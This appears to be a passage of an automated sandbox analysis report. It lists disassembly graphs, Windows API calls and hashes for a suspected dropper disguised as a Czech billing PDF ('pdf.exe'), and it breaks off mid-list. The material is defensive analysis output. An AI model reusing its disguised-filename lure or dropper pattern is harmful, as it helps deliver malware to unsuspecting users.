                          • Instruction Fuzzy Hash: CA011A71D00219DADF019FA0CE447EFBBB8EF14358F00403AE544B6180D7789604DFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 523 40642b-40644b GetSystemDirectoryW 524 40644d 523->524 525 40644f-406451 523->525 524->525 526 406462-406464 525->526 527 406453-40645c 525->527 529 406465-406498 wsprintfW LoadLibraryExW 526->529 527->526 528 40645e-406460 527->528 528->529
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406442
                          • wsprintfW.USER32 ref: 0040647D
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406491
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                          • Instruction ID: 5b72af1ba0dcc73f637375af4caef66d3bb1c1b07c81d60e398b344d0bd38167
                          • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                          • Instruction Fuzzy Hash: 44F0FC70500219A6DB14AB64DD0DF9B366CAB00704F10443AA546F10D0EBB8D725CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 530 4030bb-4030d2 531 4030d4 530->531 532 4030db-4030e4 530->532 531->532 533 4030e6 532->533 534 4030ed-4030f2 532->534 533->534 535 403102-40310f call 4032b3 534->535 536 4030f4-4030fd call 4032c9 534->536 540 4032a1 535->540 541 403115-403119 535->541 536->535 542 4032a3-4032a4 540->542 543 40324c-40324e 541->543 544 40311f-403145 GetTickCount 541->544 547 4032ac-4032b0 542->547 545 403250-403253 543->545 546 40328e-403291 543->546 548 4032a9 544->548 549 40314b-403153 544->549 545->548 552 403255 545->552 550 403293 546->550 551 403296-40329f call 4032b3 546->551 548->547 553 403155 549->553 554 403158-403166 call 4032b3 549->554 550->551 551->540 563 4032a6 551->563 556 403258-40325e 552->556 553->554 554->540 562 40316c-403175 554->562 560 403260 556->560 561 403262-403270 call 4032b3 556->561 560->561 561->540 567 403272-40327e call 405d48 561->567 565 40317b-40319b call 4065ba 562->565 563->548 572 4031a1-4031b4 GetTickCount 565->572 573 403244-403246 565->573 574 403280-40328a 567->574 575 403248-40324a 567->575 576 4031b6-4031be 572->576 577 4031ff-403201 572->577 573->542 574->556 578 40328c 574->578 575->542 579 4031c0-4031c4 576->579 580 4031c6-4031f7 MulDiv wsprintfW call 405220 576->580 581 403203-403207 577->581 582 403238-40323c 577->582 578->548 579->577 579->580 588 4031fc 580->588 585 403209-403210 call 405d48 581->585 586 40321e-403229 581->586 582->549 583 403242 582->583 583->548 591 403215-403217 585->591 587 40322c-403230 586->587 587->565 590 403236 587->590 588->577 590->548 591->575 592 403219-40321c 591->592 592->587
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CountTick$wsprintf
                          • String ID: ... %d%%
                          • API String ID: 551687249-2449383134
                          • Opcode ID: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                          • Instruction ID: 059e374e51a41a1cd1655f51f058842c2f91e709c064eb917ef28c8af98cfe57
                          • Opcode Fuzzy Hash: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                          • Instruction Fuzzy Hash: 61516C71901619EBCB10DF65DA44A9F7BA8AF44766F1442BFE810B62C0C7788B50CBA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 593 405cc5-405cd1 594 405cd2-405d06 GetTickCount GetTempFileNameW 593->594 595 405d15-405d17 594->595 596 405d08-405d0a 594->596 598 405d0f-405d12 595->598 596->594 597 405d0c 596->597 597->598
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405CE3
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",0040330F,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405CFE
                          Strings
                          • nsa, xrefs: 00405CD2
                          • "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe", xrefs: 00405CC5
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CCA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-1375079522
                          • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                          • Instruction ID: aeb5d05e7b1985b111a0783ff917fd57ebf59e966c6a14e956644d39efae3932
                          • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                          • Instruction Fuzzy Hash: ECF09076700608BFDB109F59ED09B9BB7BDEF91710F20803BF901E7180E6B49A548B68

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 599 405f8e-405fc0 RegOpenKeyExW 600 406002-406005 599->600 601 405fc2-405fe1 RegQueryValueExW 599->601 602 405fe3-405fe7 601->602 603 405fef 601->603 604 405ff2-405ffc RegCloseKey 602->604 605 405fe9-405fed 602->605 603->604 604->600 605->603 605->604
                          APIs
                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FB8
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FD9
                          • RegCloseKey.ADVAPI32(?,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FFC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: : Completed
                          • API String ID: 3677997916-2954849223
                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                          • Instruction ID: bf4835ccadc6b91b588a17594ea5523b10c7486c9727f521a7a0ead85a7fedd2
                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                          • Instruction Fuzzy Hash: AF011A3215020AEADF218F66ED09EDB3BA8EF44350F01403AF945D6260D775D964DBA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 610 4057a1-4057d2 CreateProcessW 611 4057e0-4057e1 610->611 612 4057d4-4057dd CloseHandle 610->612 612->611
                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004057CA
                          • CloseHandle.KERNEL32(?), ref: 004057D7
                          Strings
                          • Error launching installer, xrefs: 004057B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                          • Instruction ID: eb3bae85dc7754b4ca54a6a2ad4f1f733b6edfb5543e2d0442c61cb1db0afa2b
                          • Opcode Fuzzy Hash: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                          • Instruction Fuzzy Hash: EEE0B6F4600209BFEB109B64ED49F7B7AACEB48645F418525BD50F2190D6B9A8148A78

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 613 401389-40138e 614 4013fa-4013fc 613->614 615 401390-4013a0 614->615 616 4013fe 614->616 615->616 618 4013a2-4013ad call 401434 615->618 617 401400-401401 616->617 621 401404-401409 618->621 622 4013af-4013b7 call 40136d 618->622 621->617 625 4013b9-4013bb 622->625 626 4013bd-4013c2 622->626 627 4013c4-4013c9 625->627 626->627 627->614 628 4013cb-4013f4 MulDiv SendMessageW 627->628 628->614
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                          • Instruction ID: 1204d1a220e6d768f3d461a9159a4fc95a2ffbde449ffc0b80a50a9695adc5d2
                          • Opcode Fuzzy Hash: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                          • Instruction Fuzzy Hash: 4E01D132624210ABE7095B389D04B6A3698E751315F10CA3BB851F66F1DA7C8C428B4C
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                            • Part of subcall function 0040642B: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406442
                            • Part of subcall function 0040642B: wsprintfW.USER32 ref: 0040647D
                            • Part of subcall function 0040642B: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406491
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                          • Instruction ID: 5019a5ac2187e8220890e75a98e34bd06d7772fef5b84d720cc7b6e16cdc8ebf
                          • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                          • Instruction Fuzzy Hash: 6EE0863260462166D6519B745E4493772A89E99754702043EF946F3180DB789C329A6D
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000000,00000000,00405876,00000000,?,00000000,00405A4C,?,?,?,?), ref: 00405C76
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                          • Instruction ID: e06875fa0aeb3392bfbbe8f4052a6f2bae7b6028877eaa7173724ed83d9007bc
                          • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                          • Instruction Fuzzy Hash: 74D0C972504520AFC2102B28AE0C89BBB55EB542727024B35FAA9A22B0CB304C568A98
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,00000000,00403304,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405772
                          • GetLastError.KERNEL32 ref: 00405780
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
